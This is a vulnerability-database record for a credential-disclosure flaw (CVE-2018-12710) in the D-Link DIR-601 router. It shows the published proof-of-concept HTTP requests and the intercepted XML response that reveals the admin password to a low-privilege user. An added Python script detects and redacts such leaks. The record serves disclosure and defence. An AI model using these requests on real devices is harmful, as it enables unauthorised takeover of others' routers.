ID
VAR-E-201808-0147
CVE
cve_id: | CVE-2018-12710 | Trust: 1.0 |
EDB ID
45306
TITLE
DLink DIR-601 - Credential Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
DLink DIR-601 - Credential Disclosure. CVE-2018-12710. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | dlink | model: | dir-601 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: DLink DIR-601 - Credential Disclosure
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-12710
# 1. Description
# Being local to the network and having only "User" account access (which is a low privilege account),
# an attacker can intercept the response from a POST request to obtain "Admin"
# rights due to the admin password being displayed in XML.
# 2. Proof of Concept
# Tools to use:
# - BurpSuite
# - Browser of your choice
# 3: Login with "User" role account:
*My "User" role account does not have a password in this example*
POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
DNT: 1
Connection: close
request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1
# 4: When logged into the access point, click on the Tools option
# 5: You should see a request similar to the following:
POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/tools_admin.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
DNT: 1
Connection: close
request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver
# 6: Right click on this request and choose "Do Intercept response from this request"
# 7: You will see a response similar to the following:
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:19:56 GMT
Server: lighttpd/1.4.28
Content-Length: 20088
<?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name>
<admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name>
<user_user_pwd></user_user_pwd><user_level>0 ...
Trust: 1.0
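The Exploit-DB entry above shows a load_settings XML response that hands the stored admin password to a session the device itself reports as login_level 0. The following Python is an added example, not part of the Exploit-DB entry and not D-Link firmware code: it parses a response of that shape, reports any non-empty password element and flags the cross-privilege case, and shows the hardened serialisation the device should have used (blank every stored-password element before the reply leaves the box, since a settings page never needs the current password back). The sample response is constructed from the element names in the advisory with made-up values, and reading login_level 0 as a non-admin session is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample response, shaped like the load_settings reply quoted in
# the advisory above (values are made up, not captured from a real device).
SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8"?><root>'
    '<login_level>0</login_level>'
    '<admin_user><admin_user_name>admin</admin_user_name>'
    '<admin_user_pwd>example-secret</admin_user_pwd>'
    '<admin_level>1</admin_level></admin_user>'
    '<user_user><user_user_name>user</user_user_name>'
    '<user_user_pwd></user_user_pwd><user_level>0</user_level></user_user>'
    '</root>'
)

# Elements carrying a stored password in this response format (names taken
# from the XML quoted in the advisory).
PASSWORD_TAGS = ("admin_user_pwd", "user_user_pwd")


def find_credential_disclosure(xml_text: str) -> dict:
    """Inspect a load_settings response and report stored passwords it returns.

    Returns the session's login_level as reported by the device (None if the
    element is missing), every non-empty password element as (tag, value), and
    whether an admin password was handed to a non-admin session.
    Assumption: login_level 0 is a non-admin ("User") session.
    """
    root = ET.fromstring(xml_text)
    level_el = root.find("login_level")
    login_level = (
        int(level_el.text) if level_el is not None and level_el.text else None
    )
    leaked = []
    for tag in PASSWORD_TAGS:
        for el in root.iter(tag):
            if el.text:  # an empty password element discloses no secret
                leaked.append((tag, el.text))
    return {
        "login_level": login_level,
        "passwords_returned": leaked,
        # Admin credential delivered to a session the device labels non-admin
        "cross_privilege_leak": login_level == 0
        and any(tag == "admin_user_pwd" for tag, _ in leaked),
    }


def redact_passwords(xml_text: str) -> str:
    """Hardened serialisation: blank every stored-password element.

    A password-change form only has to accept a new value, so no session
    (admin included) needs the current password echoed back; stripping it
    unconditionally removes the disclosure regardless of access-control bugs.
    """
    root = ET.fromstring(xml_text)
    for tag in PASSWORD_TAGS:
        for el in root.iter(tag):
            el.text = None
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    report = find_credential_disclosure(SAMPLE_RESPONSE)
    print("login_level:", report["login_level"])
    print("passwords returned:", report["passwords_returned"])
    print("cross-privilege leak:", report["cross_privilege_leak"])
    print("redacted:", redact_passwords(SAMPLE_RESPONSE))
```

Run against a captured response body, find_credential_disclosure gives a quick yes/no on whether a device build still returns stored passwords; the redact_passwords routine is the shape of the server-side fix, applied to the full response rather than gated on the session's level, so a mistake in the level check cannot reintroduce the leak.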
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Credential Disclosure
Trust: 1.6
CREDITS
Kevin Randall
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 45306 | Trust: 1.6 |
db: | NVD | id: | CVE-2018-12710 | Trust: 1.0 |
db: | EDBNET | id: | 99136 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-12710 | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/45306/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 45306 |
db: | EDBNET | id: | 99136 |
LAST UPDATE DATE
2022-07-27T09:18:16.750000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 45306 | date: | 2018-08-30T00:00:00 |
db: | EDBNET | id: | 99136 | date: | 2018-08-30T00:00:00 |